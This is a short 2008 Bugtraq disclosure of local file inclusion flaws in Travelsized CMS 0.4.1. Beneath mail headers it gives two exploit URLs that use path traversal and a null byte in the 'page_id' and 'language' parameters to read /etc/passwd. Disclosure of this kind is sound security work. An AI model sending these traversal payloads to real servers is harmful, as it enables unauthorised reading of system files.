travelsized cms 0.4.1 multiple local file inclusion vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: travelsized cms 0.4.1 multiple local file inclusion vulnerabilities
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Wed, 12 Mar 2008 00:04:45 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=ONNhI3gruOex/f0Ex3ztUcBynMAdKjsEQVaQpvpPOvU=; b=hDtvtHvqG2snSAOLrYhwx5bglW48RhgwOJXUmtDwxkqNVYYT/D8MnBCTl+IdcfCrWL+9Vug4fclLg9Dk85XseLrGgzX9YQUf5ejiw8HQcCuAfAJ7zXFTtGhldRuWsY/GjqJQJoeoB6nlUld8tgyB8gvlbHjUKcoGnYFpSKpuAa8=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=sV482/Roxo4jdOM95i0Md+1RJ5iuXqiFpp3g1WPZahygYLNsmoHzX61BRFO9Mw41RktZp8t8UYLey26ywrZty/r42t2Ykcfh+wwRvuv1bdmk7PDdkaSPpumF7rTFzTm+9JYzZVH/cbsPbdTraR2id2nN4aWWCYidVNTtvicvLoc=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
travelsized cms 0.4.1 multiple local file inclusion vulnerabilities
download http://sourceforge.net/projects/uberghey/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
http://localhost/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://localhost/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00